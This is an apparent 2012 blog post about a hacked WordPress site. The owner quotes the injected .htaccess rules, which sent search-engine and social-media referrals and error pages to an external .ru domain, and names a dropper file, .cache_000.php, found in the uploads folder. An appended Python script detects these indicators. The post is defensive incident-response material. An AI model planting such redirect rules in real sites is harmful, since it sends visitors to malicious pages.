Wednesday, July 4, 2012

Sites Hacked? .htaccess files were code injected

(Previous Title: "Inmotion Hosting Hacked?")
At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule>
and
ErrorDocument 400 http://2012medis.ru/cocumber?4
ErrorDocument 401 http://2012medis.ru/cocumber?4
ErrorDocument 403 http://2012medis.ru/cocumber?4
ErrorDocument 404 http://2012medis.ru/cocumber?4
ErrorDocument 500 http://2012medis.ru/cocumber?4
I corrected the problem by removing the injected code from my existing files and deleting the ones that were added, which I identified quickly as being 1.57 KB (1,608 bytes).

-UPDATE-
It may be related to a file called ".cache_000.php" injected via a vulnerability with WordPress. Look in your /wp-content/uploads/ directory for .cache_000.php.
For me the file had the same timestamp as some of the .htaccess files did.

-UPDATE-
I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated WordPress.

-UPDATE-  
Update WordPress or make the .cache_000.php file not accessible.
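
A way to sweep a web root for the indicators described in this post, added here as an example and not part of the original post: .htaccess files with a referer-conditional redirect or an ErrorDocument pointing at an external URL, .htaccess files of exactly 1,608 bytes, and any file named .cache_000.php. The function names, the sample tree and the redirect.example host are constructed for illustration.

```python
import os, re, tempfile

# Patterns modelled on the injected directives quoted in the post.
REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}', re.I | re.M)
EXTERNAL_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+https?://\S+', re.I | re.M)
EXTERNAL_ERRDOC = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+https?://\S+', re.I | re.M)
DROPPER_NAME = ".cache_000.php"   # file name reported in the post
ADDED_SIZE = 1608                 # size of the added .htaccess files, per the post

def scan(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == DROPPER_NAME:
                findings.append((rel, "dropper-filename"))
            if name != ".htaccess":
                continue
            with open(path, errors="replace") as fh:
                text = fh.read()
            if REFERER_COND.search(text) and EXTERNAL_RULE.search(text):
                findings.append((rel, "referer-redirect"))
            if EXTERNAL_ERRDOC.search(text):
                findings.append((rel, "external-errordocument"))
            if os.path.getsize(path) == ADDED_SIZE:
                findings.append((rel, "size-1608"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: one clean .htaccess, one injected, one dropper."""
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\nErrorDocument 404 /404.html\n")
    with open(os.path.join(root, "blog", ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\n"
                 "RewriteCond %{HTTP_REFERER} ^.*(google|bing)\\.(.*)\n"
                 "RewriteRule ^(.*)$ http://redirect.example/x [R=301,L]\n"
                 "ErrorDocument 404 http://redirect.example/x\n")
    open(os.path.join(root, "wp-content", "uploads", DROPPER_NAME), "w").close()

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan(tmp):
            print(f"{reason:24} {rel}")
```

A legitimate .htaccess can also redirect to an external URL, so treat each hit as something to review by hand and compare file timestamps, as the post did, before deleting anything.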